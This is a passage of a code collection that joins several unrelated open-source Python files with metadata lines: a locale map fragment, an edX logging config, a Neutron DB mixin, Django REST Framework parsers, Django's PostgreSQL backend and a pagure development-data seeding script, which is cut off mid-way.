15372: 'fr_HT',
16385: 'ar_QA',
16393: 'en_IN',
16394: 'es_BO',
17409: 'ar_Ploc_SA',
17417: 'en_MY',
17418: 'es_SV',
18433: 'ar_145',
18441: 'en_SG',
18442: 'es_HN',
19465: 'en_AE',
19466: 'es_NI',
20489: 'en_BH',
20490: 'es_PR',
21513: 'en_EG',
21514: 'es_US',
22537: 'en_JO',
22538: 'es_419',
23561: 'en_KW',
24585: 'en_TR',
25609: 'en_YE',
25626: 'bs_Cyrl',
26650: 'bs_Latn',
27674: 'sr_Cyrl',
28698: 'sr_Latn',
28731: 'smn',
29740: 'az_Cyrl',
29755: 'sms',
30724: 'zh',
30740: 'nn',
30746: 'bs',
30764: 'az_Latn',
30779: 'sma',
30787: 'uz_Cyrl',
30800: 'mn_Cyrl',
30813: 'iu_Cans',
30815: 'tzm_Tfng',
31748: 'zh_Hant',
31764: 'nb',
31770: 'sr',
31784: 'tg_Cyrl',
31790: 'dsb',
31803: 'smj',
31811: 'uz_Latn',
31814: 'pa_Arab',
31824: 'mn_Mong',
31833: 'sd_Arab',
31836: 'chr_Cher',
31837: 'iu_Latn',
31839: 'tzm_Latn',
31847: 'ff_Latn',
31848: 'ha_Latn',
31890: 'ku_Arab',
65663: 'x_IV_mathan',
66567: 'de_DE_phoneb',
66574: 'hu_HU_tchncl',
66615: 'ka_GE_modern',
133124: 'zh_CN_stroke',
135172: 'zh_SG_stroke',
136196: 'zh_MO_stroke',
197636: 'zh_TW_pronun',
263172: 'zh_TW_radstr',
263185: 'ja_JP_radstr',
265220: 'zh_HK_radstr',
267268: 'zh_MO_radstr'}
| gpl-3.0 | -3,913,281,910,808,396,000 | 17.65368 | 47 | 0.423648 | false |
rue89-tech/edx-analytics-dashboard | analytics_dashboard/settings/logger.py | 4 | 3377 | """Logging configuration"""
import os
import platform
import sys
from logging.handlers import SysLogHandler
def get_logger_config(log_dir='/var/tmp',
logging_env="no_env",
edx_filename="edx.log",
dev_env=False,
debug=False,
local_loglevel='INFO',
service_variant='insights'):
"""
Return the appropriate logging config dictionary. You should assign the
result of this to the LOGGING var in your settings.
If dev_env is set to true logging will not be done via local rsyslogd,
instead, application logs will be dropped in log_dir.
"edx_filename" is ignored unless dev_env is set to true since otherwise logging is handled by rsyslogd.
"""
# Revert to INFO if an invalid string is passed in
if local_loglevel not in ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']:
local_loglevel = 'INFO'
hostname = platform.node().split(".")[0]
syslog_format = ("[service_variant={service_variant}]"
"[%(name)s][env:{logging_env}] %(levelname)s "
"[{hostname} %(process)d] [%(filename)s:%(lineno)d] "
"- %(message)s").format(
service_variant=service_variant,
logging_env=logging_env, hostname=hostname)
if debug:
handlers = ['console']
else:
handlers = ['local']
logger_config = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(asctime)s %(levelname)s %(process)d '
'[%(name)s] %(filename)s:%(lineno)d - %(message)s',
},
'syslog_format': {'format': syslog_format},
'raw': {'format': '%(message)s'},
},
'handlers': {
'console': {
'level': 'DEBUG' if debug else 'INFO',
'class': 'logging.StreamHandler',
'formatter': 'standard',
'stream': sys.stdout,
},
},
'loggers': {
'django': {
'handlers': handlers,
'propagate': True,
'level': 'INFO'
},
'': {
'handlers': handlers,
'level': 'DEBUG',
'propagate': False
},
}
}
if dev_env:
edx_file_loc = os.path.join(log_dir, edx_filename)
logger_config['handlers'].update({
'local': {
'class': 'logging.handlers.RotatingFileHandler',
'level': local_loglevel,
'formatter': 'standard',
'filename': edx_file_loc,
'maxBytes': 1024 * 1024 * 2,
'backupCount': 5,
},
})
else:
logger_config['handlers'].update({
'local': {
'level': local_loglevel,
'class': 'logging.handlers.SysLogHandler',
# Use a different address for Mac OS X
'address': '/var/run/syslog' if sys.platform == "darwin" else '/dev/log',
'formatter': 'syslog_format',
'facility': SysLogHandler.LOG_LOCAL0,
},
})
return logger_config
| agpl-3.0 | 8,683,102,707,940,834,000 | 31.471154 | 107 | 0.483269 | false |
rickerc/neutron_audit | neutron/db/routedserviceinsertion_db.py | 17 | 4553 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 VMware, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Kaiwei Fan, VMware, Inc
import sqlalchemy as sa
from sqlalchemy import event
from neutron.common import exceptions as qexception
from neutron.db import model_base
from neutron.extensions import routedserviceinsertion as rsi
class ServiceRouterBinding(model_base.BASEV2):
resource_id = sa.Column(sa.String(36),
primary_key=True)
resource_type = sa.Column(sa.String(36),
primary_key=True)
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id'),
nullable=False)
class AttributeException(qexception.NeutronException):
message = _("Resource type '%(resource_type)s' is longer "
"than %(maxlen)d characters")
@event.listens_for(ServiceRouterBinding.resource_type, 'set', retval=True)
def validate_resource_type(target, value, oldvalue, initiator):
"""Make sure the resource type fit the resource_type column."""
maxlen = ServiceRouterBinding.resource_type.property.columns[0].type.length
if len(value) > maxlen:
raise AttributeException(resource_type=value, maxlen=maxlen)
return value
class RoutedServiceInsertionDbMixin(object):
"""Mixin class to add router service insertion."""
def _process_create_resource_router_id(self, context, resource, model):
with context.session.begin(subtransactions=True):
db = ServiceRouterBinding(
resource_id=resource['id'],
resource_type=model.__tablename__,
router_id=resource[rsi.ROUTER_ID])
context.session.add(db)
return self._make_resource_router_id_dict(db, model)
def _extend_resource_router_id_dict(self, context, resource, model):
binding = self._get_resource_router_id_binding(
context, resource['resource_id'], model)
resource[rsi.ROUTER_ID] = binding['router_id']
def _get_resource_router_id_binding(self, context, model,
resource_id=None,
router_id=None):
query = self._model_query(context, ServiceRouterBinding)
query = query.filter(
ServiceRouterBinding.resource_type == model.__tablename__)
if resource_id:
query = query.filter(
ServiceRouterBinding.resource_id == resource_id)
if router_id:
query = query.filter(
ServiceRouterBinding.router_id == router_id)
return query.first()
def _get_resource_router_id_bindings(self, context, model,
resource_ids=None,
router_ids=None):
query = self._model_query(context, ServiceRouterBinding)
query = query.filter(
ServiceRouterBinding.resource_type == model.__tablename__)
if resource_ids:
query = query.filter(
ServiceRouterBinding.resource_id.in_(resource_ids))
if router_ids:
query = query.filter(
ServiceRouterBinding.router_id.in_(router_ids))
return query.all()
def _make_resource_router_id_dict(self, resource_router_binding, model,
fields=None):
resource = {'resource_id': resource_router_binding['resource_id'],
'resource_type': model.__tablename__,
rsi.ROUTER_ID: resource_router_binding[rsi.ROUTER_ID]}
return self._fields(resource, fields)
def _delete_resource_router_id_binding(self, context, resource_id, model):
with context.session.begin(subtransactions=True):
binding = self._get_resource_router_id_binding(
context, model, resource_id=resource_id)
if binding:
context.session.delete(binding)
| apache-2.0 | -8,073,803,098,463,642,000 | 41.157407 | 79 | 0.624863 | false |
iheitlager/django-rest-framework | rest_framework/parsers.py | 78 | 7968 | """
Parsers are used to parse the content of incoming HTTP requests.
They give us a generic way of being able to handle various media types
on the request, such as form content or json encoded data.
"""
from __future__ import unicode_literals
import json
from django.conf import settings
from django.core.files.uploadhandler import StopFutureHandlers
from django.http import QueryDict
from django.http.multipartparser import \
MultiPartParser as DjangoMultiPartParser
from django.http.multipartparser import (
ChunkIter, MultiPartParserError, parse_header
)
from django.utils import six
from django.utils.encoding import force_text
from django.utils.six.moves.urllib import parse as urlparse
from rest_framework import renderers
from rest_framework.exceptions import ParseError
class DataAndFiles(object):
def __init__(self, data, files):
self.data = data
self.files = files
class BaseParser(object):
"""
All parsers should extend `BaseParser`, specifying a `media_type`
attribute, and overriding the `.parse()` method.
"""
media_type = None
def parse(self, stream, media_type=None, parser_context=None):
"""
Given a stream to read from, return the parsed representation.
Should return parsed data, or a `DataAndFiles` object consisting of the
parsed data and files.
"""
raise NotImplementedError(".parse() must be overridden.")
class JSONParser(BaseParser):
"""
Parses JSON-serialized data.
"""
media_type = 'application/json'
renderer_class = renderers.JSONRenderer
def parse(self, stream, media_type=None, parser_context=None):
"""
Parses the incoming bytestream as JSON and returns the resulting data.
"""
parser_context = parser_context or {}
encoding = parser_context.get('encoding', settings.DEFAULT_CHARSET)
try:
data = stream.read().decode(encoding)
return json.loads(data)
except ValueError as exc:
raise ParseError('JSON parse error - %s' % six.text_type(exc))
class FormParser(BaseParser):
"""
Parser for form data.
"""
media_type = 'application/x-www-form-urlencoded'
def parse(self, stream, media_type=None, parser_context=None):
"""
Parses the incoming bytestream as a URL encoded form,
and returns the resulting QueryDict.
"""
parser_context = parser_context or {}
encoding = parser_context.get('encoding', settings.DEFAULT_CHARSET)
data = QueryDict(stream.read(), encoding=encoding)
return data
class MultiPartParser(BaseParser):
"""
Parser for multipart form data, which may include file data.
"""
media_type = 'multipart/form-data'
def parse(self, stream, media_type=None, parser_context=None):
"""
Parses the incoming bytestream as a multipart encoded form,
and returns a DataAndFiles object.
`.data` will be a `QueryDict` containing all the form parameters.
`.files` will be a `QueryDict` containing all the form files.
"""
parser_context = parser_context or {}
request = parser_context['request']
encoding = parser_context.get('encoding', settings.DEFAULT_CHARSET)
meta = request.META.copy()
meta['CONTENT_TYPE'] = media_type
upload_handlers = request.upload_handlers
try:
parser = DjangoMultiPartParser(meta, stream, upload_handlers, encoding)
data, files = parser.parse()
return DataAndFiles(data, files)
except MultiPartParserError as exc:
raise ParseError('Multipart form parse error - %s' % six.text_type(exc))
class FileUploadParser(BaseParser):
"""
Parser for file upload data.
"""
media_type = '*/*'
def parse(self, stream, media_type=None, parser_context=None):
"""
Treats the incoming bytestream as a raw file upload and returns
a `DateAndFiles` object.
`.data` will be None (we expect request body to be a file content).
`.files` will be a `QueryDict` containing one 'file' element.
"""
parser_context = parser_context or {}
request = parser_context['request']
encoding = parser_context.get('encoding', settings.DEFAULT_CHARSET)
meta = request.META
upload_handlers = request.upload_handlers
filename = self.get_filename(stream, media_type, parser_context)
# Note that this code is extracted from Django's handling of
# file uploads in MultiPartParser.
content_type = meta.get('HTTP_CONTENT_TYPE',
meta.get('CONTENT_TYPE', ''))
try:
content_length = int(meta.get('HTTP_CONTENT_LENGTH',
meta.get('CONTENT_LENGTH', 0)))
except (ValueError, TypeError):
content_length = None
# See if the handler will want to take care of the parsing.
for handler in upload_handlers:
result = handler.handle_raw_input(None,
meta,
content_length,
None,
encoding)
if result is not None:
return DataAndFiles({}, {'file': result[1]})
# This is the standard case.
possible_sizes = [x.chunk_size for x in upload_handlers if x.chunk_size]
chunk_size = min([2 ** 31 - 4] + possible_sizes)
chunks = ChunkIter(stream, chunk_size)
counters = [0] * len(upload_handlers)
for index, handler in enumerate(upload_handlers):
try:
handler.new_file(None, filename, content_type,
content_length, encoding)
except StopFutureHandlers:
upload_handlers = upload_handlers[:index + 1]
break
for chunk in chunks:
for index, handler in enumerate(upload_handlers):
chunk_length = len(chunk)
chunk = handler.receive_data_chunk(chunk, counters[index])
counters[index] += chunk_length
if chunk is None:
break
for index, handler in enumerate(upload_handlers):
file_obj = handler.file_complete(counters[index])
if file_obj:
return DataAndFiles({}, {'file': file_obj})
raise ParseError("FileUpload parse error - "
"none of upload handlers can handle the stream")
def get_filename(self, stream, media_type, parser_context):
"""
Detects the uploaded file name. First searches a 'filename' url kwarg.
Then tries to parse Content-Disposition header.
"""
try:
return parser_context['kwargs']['filename']
except KeyError:
pass
try:
meta = parser_context['request'].META
disposition = parse_header(meta['HTTP_CONTENT_DISPOSITION'].encode('utf-8'))
filename_parm = disposition[1]
if 'filename*' in filename_parm:
return self.get_encoded_filename(filename_parm)
return force_text(filename_parm['filename'])
except (AttributeError, KeyError, ValueError):
pass
def get_encoded_filename(self, filename_parm):
"""
Handle encoded filenames per RFC6266. See also:
http://tools.ietf.org/html/rfc2231#section-4
"""
encoded_filename = force_text(filename_parm['filename*'])
try:
charset, lang, filename = encoded_filename.split('\'', 2)
filename = urlparse.unquote(filename)
except (ValueError, LookupError):
filename = force_text(filename_parm['filename'])
return filename
| bsd-2-clause | -8,359,600,898,694,691,000 | 34.891892 | 88 | 0.607555 | false |
cntnboys/410Lab6 | build/django/build/lib.linux-x86_64-2.7/django/db/backends/postgresql_psycopg2/base.py | 21 | 8837 | """
PostgreSQL database backend for Django.
Requires psycopg 2: http://initd.org/projects/psycopg2
"""
from django.conf import settings
from django.db.backends import (BaseDatabaseFeatures, BaseDatabaseWrapper,
BaseDatabaseValidation)
from django.db.backends.postgresql_psycopg2.operations import DatabaseOperations
from django.db.backends.postgresql_psycopg2.client import DatabaseClient
from django.db.backends.postgresql_psycopg2.creation import DatabaseCreation
from django.db.backends.postgresql_psycopg2.version import get_version
from django.db.backends.postgresql_psycopg2.introspection import DatabaseIntrospection
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.utils import InterfaceError
from django.utils.encoding import force_str
from django.utils.functional import cached_property
from django.utils.safestring import SafeText, SafeBytes
from django.utils.timezone import utc
try:
import psycopg2 as Database
import psycopg2.extensions
except ImportError as e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading psycopg2 module: %s" % e)
DatabaseError = Database.DatabaseError
IntegrityError = Database.IntegrityError
psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)
psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY)
psycopg2.extensions.register_adapter(SafeBytes, psycopg2.extensions.QuotedString)
psycopg2.extensions.register_adapter(SafeText, psycopg2.extensions.QuotedString)
def utc_tzinfo_factory(offset):
if offset != 0:
raise AssertionError("database connection isn't set to UTC")
return utc
class DatabaseFeatures(BaseDatabaseFeatures):
needs_datetime_string_cast = False
can_return_id_from_insert = True
requires_rollback_on_dirty_transaction = True
has_real_datatype = True
can_defer_constraint_checks = True
has_select_for_update = True
has_select_for_update_nowait = True
has_bulk_insert = True
uses_savepoints = True
supports_tablespaces = True
supports_transactions = True
can_introspect_ip_address_field = True
can_introspect_small_integer_field = True
can_distinct_on_fields = True
can_rollback_ddl = True
supports_combined_alters = True
nulls_order_largest = True
closed_cursor_error_class = InterfaceError
has_case_insensitive_like = False
requires_sqlparse_for_splitting = False
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'postgresql'
operators = {
'exact': '= %s',
'iexact': '= UPPER(%s)',
'contains': 'LIKE %s',
'icontains': 'LIKE UPPER(%s)',
'regex': '~ %s',
'iregex': '~* %s',
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': 'LIKE %s',
'endswith': 'LIKE %s',
'istartswith': 'LIKE UPPER(%s)',
'iendswith': 'LIKE UPPER(%s)',
}
pattern_ops = {
'startswith': "LIKE %s || '%%%%'",
'istartswith': "LIKE UPPER(%s) || '%%%%'",
}
Database = Database
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.features = DatabaseFeatures(self)
self.ops = DatabaseOperations(self)
self.client = DatabaseClient(self)
self.creation = DatabaseCreation(self)
self.introspection = DatabaseIntrospection(self)
self.validation = BaseDatabaseValidation(self)
def get_connection_params(self):
settings_dict = self.settings_dict
# None may be used to connect to the default 'postgres' db
if settings_dict['NAME'] == '':
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured(
"settings.DATABASES is improperly configured. "
"Please supply the NAME value.")
conn_params = {
'database': settings_dict['NAME'] or 'postgres',
}
conn_params.update(settings_dict['OPTIONS'])
if 'autocommit' in conn_params:
del conn_params['autocommit']
if 'isolation_level' in conn_params:
del conn_params['isolation_level']
if settings_dict['USER']:
conn_params['user'] = settings_dict['USER']
if settings_dict['PASSWORD']:
conn_params['password'] = force_str(settings_dict['PASSWORD'])
if settings_dict['HOST']:
conn_params['host'] = settings_dict['HOST']
if settings_dict['PORT']:
conn_params['port'] = settings_dict['PORT']
return conn_params
def get_new_connection(self, conn_params):
connection = Database.connect(**conn_params)
# self.isolation_level must be set:
# - after connecting to the database in order to obtain the database's
# default when no value is explicitly specified in options.
# - before calling _set_autocommit() because if autocommit is on, that
# will set connection.isolation_level to ISOLATION_LEVEL_AUTOCOMMIT;
# and if autocommit is off, on psycopg2 < 2.4.2, _set_autocommit()
# needs self.isolation_level.
options = self.settings_dict['OPTIONS']
try:
self.isolation_level = options['isolation_level']
except KeyError:
self.isolation_level = connection.isolation_level
else:
# Set the isolation level to the value from OPTIONS. This isn't
# needed on psycopg2 < 2.4.2 because it happens as a side-effect
# of _set_autocommit(False).
if (self.isolation_level != connection.isolation_level and
self.psycopg2_version >= (2, 4, 2)):
connection.set_session(isolation_level=self.isolation_level)
return connection
def init_connection_state(self):
settings_dict = self.settings_dict
self.connection.set_client_encoding('UTF8')
tz = 'UTC' if settings.USE_TZ else settings_dict.get('TIME_ZONE')
if tz:
try:
get_parameter_status = self.connection.get_parameter_status
except AttributeError:
# psycopg2 < 2.0.12 doesn't have get_parameter_status
conn_tz = None
else:
conn_tz = get_parameter_status('TimeZone')
if conn_tz != tz:
cursor = self.connection.cursor()
try:
cursor.execute(self.ops.set_time_zone_sql(), [tz])
finally:
cursor.close()
# Commit after setting the time zone (see #17062)
if not self.get_autocommit():
self.connection.commit()
def create_cursor(self):
cursor = self.connection.cursor()
cursor.tzinfo_factory = utc_tzinfo_factory if settings.USE_TZ else None
return cursor
def _set_isolation_level(self, isolation_level):
assert isolation_level in range(1, 5) # Use set_autocommit for level = 0
if self.psycopg2_version >= (2, 4, 2):
self.connection.set_session(isolation_level=isolation_level)
else:
self.connection.set_isolation_level(isolation_level)
def _set_autocommit(self, autocommit):
with self.wrap_database_errors:
if self.psycopg2_version >= (2, 4, 2):
self.connection.autocommit = autocommit
else:
if autocommit:
level = psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT
else:
level = self.isolation_level
self.connection.set_isolation_level(level)
def check_constraints(self, table_names=None):
"""
To check constraints, we set constraints to immediate. Then, when, we're done we must ensure they
are returned to deferred.
"""
self.cursor().execute('SET CONSTRAINTS ALL IMMEDIATE')
self.cursor().execute('SET CONSTRAINTS ALL DEFERRED')
def is_usable(self):
try:
# Use a psycopg cursor directly, bypassing Django's utilities.
self.connection.cursor().execute("SELECT 1")
except Database.Error:
return False
else:
return True
def schema_editor(self, *args, **kwargs):
"Returns a new instance of this backend's SchemaEditor"
return DatabaseSchemaEditor(self, *args, **kwargs)
@cached_property
def psycopg2_version(self):
version = psycopg2.__version__.split(' ', 1)[0]
return tuple(int(v) for v in version.split('.'))
@cached_property
def pg_version(self):
with self.temporary_connection():
return get_version(self.connection)
| apache-2.0 | -6,457,968,663,639,534,000 | 37.58952 | 105 | 0.636641 | false |
pypingou/pagure | dev-data.py | 1 | 21989 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Populate the pagure db with some dev data. """
from __future__ import print_function, unicode_literals, absolute_import
import argparse
import os
import tempfile
import pygit2
import shutil
import six
from sqlalchemy import create_engine, MetaData
import pagure
import tests
import pagure.lib.model
import pagure.lib.query
from pagure.lib.login import generate_hashed_value
from pagure.lib.model import create_default_status
from pagure.lib.repo import PagureRepo
'''
Usage:
python dev-data.py --init
python dev-data.py --clean
python dev-data.py --populate
python dev-data.py --all
'''
_config = pagure.config.reload_config()
def empty_dev_db(session):
print('')
print('WARNING: Deleting all data from', _config['DB_URL'])
response = os.environ.get("FORCE_DELETE")
if not response:
response = six.moves.input('Do you want to continue? (yes/no) ')
if response.lower().startswith('y'):
tables = reversed(pagure.lib.model_base.BASE.metadata.sorted_tables)
for tbl in tables:
session.execute(tbl.delete())
else:
exit("Aborting.")
def insert_data(session, username, user_email):
_config['EMAIL_SEND'] = False
_config['TESTING'] = True
######################################
# tags
item = pagure.lib.model.Tag(
tag='tag1',
)
session.add(item)
session.commit()
######################################
# Users
# Create a couple of users
pingou = item = pagure.lib.model.User(
user='pingou',
fullname='PY C',
password=generate_hashed_value(u'testing123'),
token=None,
default_email='[email protected]',
)
session.add(item)
session.commit()
print("User created: {} <{}>, {}".format(item.user, item.default_email, 'testing123'))
foo = item = pagure.lib.model.User(
user='foo',
fullname='foo bar',
password=generate_hashed_value(u'testing123'),
token=None,
default_email='[email protected]',
)
session.add(item)
session.commit()
print("User created: {} <{}>, {}".format(item.user, item.default_email, 'testing123'))
you = item = pagure.lib.model.User(
user=username,
fullname=username,
password=generate_hashed_value(u'testing123'),
token=None,
default_email=user_email,
)
session.add(item)
session.commit()
print("User created: {} <{}>, {}".format(item.user, item.default_email, 'testing123'))
######################################
# pagure_group
item = pagure.lib.model.PagureGroup(
group_name='admin',
group_type='admin',
user_id=pingou.id,
display_name='admin',
description='Admin Group',
)
session.add(item)
session.commit()
print('Created "admin" group. Pingou is a member.')
# Add a couple of groups so that we can list them
item = pagure.lib.model.PagureGroup(
group_name='group',
group_type='user',
user_id=pingou.id,
display_name='group group',
description='this is a group group',
)
session.add(item)
session.commit()
print('Created "group" group. Pingou is a member.')
item = pagure.lib.model.PagureGroup(
group_name='rel-eng',
group_type='user',
user_id=pingou.id,
display_name='Release Engineering',
description='The group of release engineers',
)
session.add(item)
session.commit()
print('Created "rel-eng" group. Pingou is a member.')
######################################
# projects
import shutil
# delete folder from local instance to start from a clean slate
if os.path.exists(_config['GIT_FOLDER']):
shutil.rmtree(_config['GIT_FOLDER'])
# Create projects
item = project1 = pagure.lib.model.Project(
user_id=pingou.id,
name='test',
is_fork=False,
parent_id=None,
description='test project #1',
hook_token='aaabbbccc',
)
item.close_status = ['Invalid', 'Insufficient data', 'Fixed', 'Duplicate']
session.add(item)
session.flush()
tests.create_locks(session, item)
item = project2 = pagure.lib.model.Project(
user_id=pingou.id,
name='test2',
is_fork=False,
parent_id=None,
description='test project #2',
hook_token='aaabbbddd',
)
item.close_status = ['Invalid', 'Insufficient data', 'Fixed', 'Duplicate']
session.add(item)
item = project3 = pagure.lib.model.Project(
user_id=pingou.id,
name='test3',
is_fork=False,
parent_id=None,
description='namespaced test project',
hook_token='aaabbbeee',
namespace='somenamespace',
)
item.close_status = ['Invalid', 'Insufficient data', 'Fixed', 'Duplicate']
session.add(item)
session.commit()
tests.create_projects_git(_config['GIT_FOLDER'], bare=True)
add_content_git_repo(
os.path.join(_config['GIT_FOLDER'], 'test.git'))
tests.add_readme_git_repo(
os.path.join(_config['GIT_FOLDER'], 'test.git'))
# Add some content to the git repo
add_content_git_repo(
os.path.join(_config['GIT_FOLDER'], 'forks', 'pingou',
'test.git'))
tests.add_readme_git_repo(
os.path.join(_config['GIT_FOLDER'], 'forks', 'pingou',
'test.git'))
tests.add_commit_git_repo(
os.path.join(_config['GIT_FOLDER'], 'forks', 'pingou',
'test.git'), ncommits=10)
######################################
# user_emails
item = pagure.lib.model.UserEmail(
user_id=pingou.id,
email='[email protected]')
session.add(item)
item = pagure.lib.model.UserEmail(
user_id=pingou.id,
email='[email protected]')
session.add(item)
item = pagure.lib.model.UserEmail(
user_id=foo.id,
email='[email protected]')
session.add(item)
item = pagure.lib.model.UserEmail(
user_id=you.id,
email=user_email)
session.add(item)
session.commit()
######################################
# user_emails_pending
email_pend = pagure.lib.model.UserEmailPending(
user_id=pingou.id,
email='[email protected]',
token='abcdef',
)
session.add(email_pend)
session.commit()
######################################
# issues
# Add an issue and tag it so that we can list them
item = pagure.lib.model.Issue(
id=1001,
uid='foobar',
project_id=project1.id,
title='Problem with jenkins build',
content='For some reason the tests fail at line:24',
user_id=pingou.id,
)
session.add(item)
session.commit()
item = pagure.lib.model.Issue(
id=1002,
uid='foobar2',
project_id=project1.id,
title='Unit tests failing',
content='Need to fix code for the unit tests to '
'pass so jenkins build can complete.',
user_id=pingou.id,
)
session.add(item)
session.commit()
item = pagure.lib.model.Issue(
id=1003,
uid='foobar3',
project_id=project1.id,
title='Segfault during execution',
content='Index out of bounds for variable i?',
user_id=you.id,
)
session.add(item)
session.commit()
######################################
# pagure_user_group
group = pagure.lib.query.search_groups(session, pattern=None,
group_name="rel-eng", group_type=None)
item = pagure.lib.model.PagureUserGroup(
user_id=pingou.id,
group_id=group.id
)
session.add(item)
session.commit()
group = pagure.lib.query.search_groups(session, pattern=None,
group_name="admin", group_type=None)
item = pagure.lib.model.PagureUserGroup(
user_id=you.id,
group_id=group.id
)
session.add(item)
session.commit()
group = pagure.lib.query.search_groups(session, pattern=None,
group_name="group", group_type=None)
item = pagure.lib.model.PagureUserGroup(
user_id=foo.id,
group_id=group.id
)
session.add(item)
session.commit()
######################################
# projects_groups
group = pagure.lib.query.search_groups(session, pattern=None,
group_name="rel-eng", group_type=None)
repo = pagure.lib.query.get_authorized_project(session, 'test')
item = pagure.lib.model.ProjectGroup(
project_id=repo.id,
group_id=group.id,
access="commit"
)
session.add(item)
session.commit()
group = pagure.lib.query.search_groups(session, pattern=None,
group_name="admin", group_type=None)
repo = pagure.lib.query.get_authorized_project(session, 'test2')
item = pagure.lib.model.ProjectGroup(
project_id=repo.id,
group_id=group.id,
access="admin"
)
session.add(item)
session.commit()
######################################
# pull_requests
repo = pagure.lib.query.get_authorized_project(session, 'test')
forked_repo = pagure.lib.query.get_authorized_project(session, 'test')
req = pagure.lib.query.new_pull_request(
session=session,
repo_from=forked_repo,
branch_from='master',
repo_to=repo,
branch_to='master',
title='Fixing code for unittest',
user=username,
status="Open"
)
session.commit()
repo = pagure.lib.query.get_authorized_project(session, 'test')
forked_repo = pagure.lib.query.get_authorized_project(session, 'test')
req = pagure.lib.query.new_pull_request(
session=session,
repo_from=forked_repo,
branch_from='master',
repo_to=repo,
branch_to='master',
title='add very nice README',
user=username,
status="Open"
)
session.commit()
repo = pagure.lib.query.get_authorized_project(session, 'test')
forked_repo = pagure.lib.query.get_authorized_project(session, 'test')
req = pagure.lib.query.new_pull_request(
session=session,
repo_from=forked_repo,
branch_from='master',
repo_to=repo,
branch_to='master',
title='Add README',
user=username,
status="Closed"
)
session.commit()
repo = pagure.lib.query.get_authorized_project(session, 'test')
forked_repo = pagure.lib.query.get_authorized_project(session, 'test')
req = pagure.lib.query.new_pull_request(
session=session,
repo_from=forked_repo,
branch_from='master',
repo_to=repo,
branch_to='master',
title='Fix some containers',
user=username,
status="Merged"
)
session.commit()
repo = pagure.lib.query.get_authorized_project(session, 'test')
forked_repo = pagure.lib.query.get_authorized_project(session, 'test')
req = pagure.lib.query.new_pull_request(
session=session,
repo_from=forked_repo,
branch_from='master',
repo_to=repo,
branch_to='master',
title='Fix pull request statuses',
user=username,
status="Closed"
)
session.commit()
repo = pagure.lib.query.get_authorized_project(session, 'test')
forked_repo = pagure.lib.query.get_authorized_project(session, 'test')
req = pagure.lib.query.new_pull_request(
session=session,
repo_from=forked_repo,
branch_from='master',
repo_to=repo,
branch_to='master',
title='Fixing UI of issue',
user=username,
status="Merged"
)
session.commit()
#####################################
# tokens
tests.create_tokens(session, user_id=pingou.id, project_id=project1.id)
######################################
# user_projects
repo = pagure.lib.query.get_authorized_project(session, 'test')
item = pagure.lib.model.ProjectUser(
project_id=repo.id,
user_id=foo.id,
access="commit"
)
session.add(item)
session.commit()
repo = pagure.lib.query.get_authorized_project(session, 'test2')
item = pagure.lib.model.ProjectUser(
project_id=repo.id,
user_id=you.id,
access="commit"
)
session.add(item)
session.commit()
######################################
# issue_comments
item = pagure.lib.model.IssueComment(
user_id=pingou.id,
issue_uid='foobar',
comment='We may need to adjust the unittests instead of the code.',
)
session.add(item)
session.commit()
######################################
# issue_to_issue
repo = pagure.lib.query.get_authorized_project(session, 'test')
all_issues = pagure.lib.query.search_issues(session, repo)
pagure.lib.query.add_issue_dependency(session, all_issues[0],
all_issues[1], 'pingou')
######################################
# pull_request_comments
user = pagure.lib.query.search_user(session, username='pingou')
# only 1 pull request available atm
pr = pagure.lib.query.get_pull_request_of_user(session, "pingou")[0]
item = pagure.lib.model.PullRequestComment(
pull_request_uid=pr.uid,
user_id=user.id,
comment="+1 for me. Btw, could you rebase before you merge?",
notification=0
)
session.add(item)
session.commit()
######################################
# pull_request_flags
# only 1 pull request available atm
pr = pagure.lib.query.get_pull_request_of_user(session, "pingou")[0]
item = pagure.lib.model.PullRequestFlag(
uid="random_pr_flag_uid",
pull_request_uid=pr.uid,
user_id=pingou.id,
username=pingou.user,
percent=80,
comment="Jenkins build passes",
url=str(pr.id),
status="success"
)
session.add(item)
session.commit()
pr = pagure.lib.query.get_pull_request_of_user(session, "foo")[1]
item = pagure.lib.model.PullRequestFlag(
uid="oink oink uid",
pull_request_uid=pr.uid,
user_id=pingou.id,
username=pingou.user,
percent=80,
comment="Jenkins does not pass",
url=str(pr.id),
status="failure"
)
session.add(item)
session.commit()
######################################
# pull_request_assignee
pr = pagure.lib.query.search_pull_requests(session, requestid='1006')
pr.assignee_id = pingou.id
session.commit()
pr = pagure.lib.query.search_pull_requests(session, requestid='1007')
pr.assignee_id = you.id
session.commit()
pr = pagure.lib.query.search_pull_requests(session, requestid='1004')
pr.assignee_id = foo.id
session.commit()
######################################
# tags_issues
repo = pagure.lib.query.get_authorized_project(session, 'test')
issues = pagure.lib.query.search_issues(session, repo)
item = pagure.lib.model.TagIssue(
issue_uid=issues[0].uid,
tag='tag1',
)
session.add(item)
session.commit()
######################################
# tokens_acls
tests.create_tokens_acl(session)
######################################
# Fork a project
# delete fork data
fork_proj_location = "forks/foo/test.git"
try:
shutil.rmtree(os.path.join(_config['GIT_FOLDER'],
fork_proj_location))
except:
print('git folder already deleted')
try:
shutil.rmtree(os.path.join(_config['DOCS_FOLDER'],
fork_proj_location))
except:
print('docs folder already deleted')
try:
